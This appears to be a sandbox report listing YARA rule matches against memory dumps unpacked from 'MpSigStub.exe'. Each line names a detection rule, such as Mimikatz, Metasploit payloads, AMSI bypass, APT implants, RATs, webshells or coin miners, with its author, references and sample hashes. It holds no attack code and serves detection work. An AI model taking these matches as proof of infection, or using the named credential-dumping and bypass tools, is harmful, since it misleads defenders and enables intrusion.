Source: 38.3.MpSigStub.exe.138bd223b1a.210.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.210.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 38.3.MpSigStub.exe.138bdfe9176.46.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 38.3.MpSigStub.exe.138bdfb53f6.20.unpack, type: UNPACKEDPE	Matched rule: Msfpayloads_msf_10 date = 2017-02-09, hash1 = 3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082, author = Florian Roth, description = Metasploit Payloads - file msf.exe, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb68b9.126.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd4f6df4.69.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac8d52.188.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bd0ce56a.155.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 38.3.MpSigStub.exe.138bda7e4ba.61.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138bdfb53f6.75.unpack, type: UNPACKEDPE	Matched rule: Msfpayloads_msf_10 date = 2017-02-09, hash1 = 3cd74fa28323c0d64f45507675ac08fb09bae4dd6b7e11f2832a4fbc70bb7082, author = Florian Roth, description = Metasploit Payloads - file msf.exe, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac794e.117.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bd94c4f5.98.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 38.3.MpSigStub.exe.138bd21de7c.196.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac654a.187.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 38.3.MpSigStub.exe.138be2d6086.53.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138be2d6086.53.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 38.3.MpSigStub.exe.138bd51435e.70.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd1720c9.183.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd223b1a.148.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.148.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb54b5.125.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdbb68b9.112.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bce160d6.17.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 38.3.MpSigStub.exe.138bd0cfd72.157.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be22418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.197.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.197.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bd1d8af6.146.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138be8f860a.87.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb7ebd.111.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd1720c9.207.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bd16fc75.208.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138be2d6086.218.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138be2d6086.218.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 38.3.MpSigStub.exe.138bd16fc75.184.raw.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 38.3.MpSigStub.exe.138bd21de7c.209.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE	Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 38.3.MpSigStub.exe.138be3e4c13.121.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138be5658a9.38.raw.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be5658a9.38.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bdbb7ebd.150.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
